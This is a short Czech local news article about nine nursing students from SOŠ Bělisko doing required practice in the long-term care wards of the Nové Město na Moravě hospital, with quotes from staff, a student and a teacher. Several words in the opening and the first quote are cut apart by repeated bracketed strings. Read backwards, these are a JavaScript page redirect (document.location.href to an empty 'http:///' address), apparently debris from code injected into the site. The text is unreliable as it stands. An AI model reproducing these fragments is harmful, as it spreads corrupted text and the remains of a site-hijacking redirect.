Rainbow page separator

V nemocnice praktikují budoucí ošetřovatelky z Běliska

Úterý, 26. března 2019

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Devět studentek oboru ošetřovatelka ze Střední odborné školy v Novém Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě (SOŠ Bělisko) absolvuje povinnou praxi v odděleních dlouhodobě nemocných v novoměstské nemocnici.
„Pro nemocnici přináší ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to spolupráce významnou pomoc. Studentky se rychle učí, dobře se orientují, bez větších potíží dokáží plnit úkoly, které jim personál svěří. Ze školy přichází dobře připravené,“ poznamenala náměstkyně ošetřovatelské péče Bohdana Marečková s tím, že doufá, že některá z děvčat v nemocnici zůstanou po ukončení studií pracovat.
To nevylučují ani samotné budoucí ošetřovatelky. „Mně se tady moc líbí, jsou na nás hodní, vše nám ukážou, vysvětlí. A když vejdeme na pokoj, tak se pacienti úplně rozzáří, že vidí nové tváře. Dokážu si představit, že bych tady po dokončení školy pracovala,“ sdělila kupříkladu studentka druhého ročníku Stella Hejtmánková.
Spolupráci s novoměstskou nemocnicí si pochvaluje i učitelka odborného výcviku školy Iva Kondýsková. „Praxe na oddělení dlouhodobě nemocných studentky připraví do ostatních zařízení, která poskytují sociální služby. V nemocnici se naučí a vyzkoušejí celé spektrum péče, kterou budou k výkonu povolání ošetřovatelky potřebovat. Navíc mohou vykonávat praxi v Novém Městě, přímo v místě školy, což je velká výhoda,“ doplnila učitelka.